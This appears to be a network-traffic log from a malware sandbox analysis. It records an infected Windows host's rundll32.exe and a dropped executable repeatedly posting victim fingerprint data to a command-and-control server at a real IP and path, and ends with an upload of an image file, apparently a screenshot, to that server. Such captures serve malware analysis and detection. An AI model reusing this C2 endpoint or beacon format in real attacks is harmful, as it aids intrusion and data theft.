Apr 28, 2021 23:00:39.527647972 CEST | 13122 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 21:00:39 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 6
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 63 3e 3c 64 3e
Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
563 | 192.168.2.4 | 50088 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:39.742125988 CEST | 13282 | OUT | POST /Hnq8vS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.111.174.114
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
564 | 176.111.174.114 | 80 | 192.168.2.4 | 50088 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:39.844007015 CEST | 13310 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 21:00:39 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 6
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 63 3e 3c 64 3e
Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
565 | 176.111.174.114 | 80 | 192.168.2.4 | 50086 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:39.865937948 CEST | 13310 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 21:00:39 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
566 | 192.168.2.4 | 50090 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:40.055641890 CEST | 13311 | OUT | POST /Hnq8vS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.111.174.114
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
567 | 176.111.174.114 | 80 | 192.168.2.4 | 50090 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:40.153601885 CEST | 13311 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 21:00:40 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 6
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 63 3e 3c 64 3e
Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
568 | 192.168.2.4 | 50091 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:40.363915920 CEST | 13312 | OUT | POST /Hnq8vS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.111.174.114
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
569 | 176.111.174.114 | 80 | 192.168.2.4 | 50091 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:40.461193085 CEST | 13313 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 21:00:40 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 6
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 63 3e 3c 64 3e
Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
57 | 176.111.174.114 | 80 | 192.168.2.4 | 49776 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:19.603080034 CEST | 4549 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 20:59:19 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 6
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 63 3e 3c 64 3e
Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
570 | 192.168.2.4 | 50092 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:40.659600973 CEST | 13313 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
571 | 176.111.174.114 | 80 | 192.168.2.4 | 50092 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:40.758877039 CEST | 13314 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:40 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
572 | 192.168.2.4 | 50093 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:40.986804008 CEST | 13314 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
573 | 176.111.174.114 | 80 | 192.168.2.4 | 50093 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:41.092780113 CEST | 13315 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:41 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
574 | 192.168.2.4 | 50095 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:41.303684950 CEST | 13315 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
575 | 176.111.174.114 | 80 | 192.168.2.4 | 50095 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:41.402677059 CEST | 13316 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:41 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
576 | 192.168.2.4 | 50096 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:41.619910002 CEST | 13316 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
577 | 176.111.174.114 | 80 | 192.168.2.4 | 50096 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:41.722769976 CEST | 13317 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:41 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
578 | 192.168.2.4 | 50097 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:41.937402010 CEST | 13317 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
579 | 176.111.174.114 | 80 | 192.168.2.4 | 50097 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:42.039381981 CEST | 13318 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:42 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
58 | 192.168.2.4 | 49777 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:19.817760944 CEST | 4550 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
580 | 192.168.2.4 | 50098 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:42.243216991 CEST | 13318 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
581 | 176.111.174.114 | 80 | 192.168.2.4 | 50098 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:42.345041990 CEST | 13319 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:42 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
582 | 192.168.2.4 | 50099 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:42.481595039 CEST | 13332 | OUT | POST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227171
                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x 
?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. 
JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 23:00:42.578255892 CEST13336OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 23:00:42.578310013 CEST13349OUTData Raw: a9 4b 76 b5 94 15 3e 9b 28 c5 7b b6 d6 2f 67 d0 fa 03 51 bf fd 90 bf 6a ef 86 7f 0c b4 ff 00 1b fe d0 f6 df 08 ff 00 e1 56 58 ea 1e 1c bd d1 3c 49 a0 6a fa a4 fa 9f 87 df 58 bc d4 ed 27 d3 0d 8d b5 c4 4f 7c a9 7d 71 04 90 dd cb 69 11 78 a0 61 3e
                                                                                                                                          Data Ascii: Kv>({/gQjVX<IjX'O|}qixa>$|y=|K^>a?i={i6A&4e"$x;[u|Dz58AYRUwvvJ8.JJ2m]KO_Oe'tc
                                                                                                                                          Apr 28, 2021 23:00:42.578336954 CEST13359OUTData Raw: a5 4f b0 d4 7e 5f bd 5f 2b 27 98 6d 2e d3 8c d3 d5 01 3c 53 bc bf 7a 5c a4 f3 11 6c 3e 94 04 39 fb b5 2f 97 ef 47 97 ef 4f 94 39 88 dd 09 fe 1a 36 1a 95 a1 4c ff 00 85 27 d9 bd a9 72 87 31 1f 97 ef 47 97 ef 53 79 1e f4 92 47 e5 d3 e5 61 cc 8a ec
                                                                                                                                          Data Ascii: O~__+'m.<Sz\l>9/GO96L'r1GSyGa>SQG++2rNj9GCT_&b!eI<1GSI79zO%jzn9C%E^eL^|hZMP<aS3czT{3XJmN2H
                                                                                                                                          Apr 28, 2021 23:00:42.673743010 CEST13365OUTData Raw: cf e6 5e 9c f1 56 25 d3 a5 85 80 09 9c 74 15 ea 65 b9 46 2b 01 5a ac e7 3b a9 b6 d2 e8 9b 94 a4 ff 00 f4 a5 1d 2d a4 57 5b b7 e5 e3 b3 4c 2e 36 95 38 42 3a c5 5a ef 76 94 63 15 eb f0 f3 36 fe d4 a5 b2 b2 55 e9 b1 f7 a9 9a de 6e a5 29 16 37 cf dc
                                                                                                                                          Data Ascii: ^V%teF+Z;-W[L.68B:Zvc6Un)7[yTZ?Z>\rJTMt}^S.a?H*Ty;rAOXjjXB*~etrs]P7JY#o:`3"U&9/)<9/SRy^h#
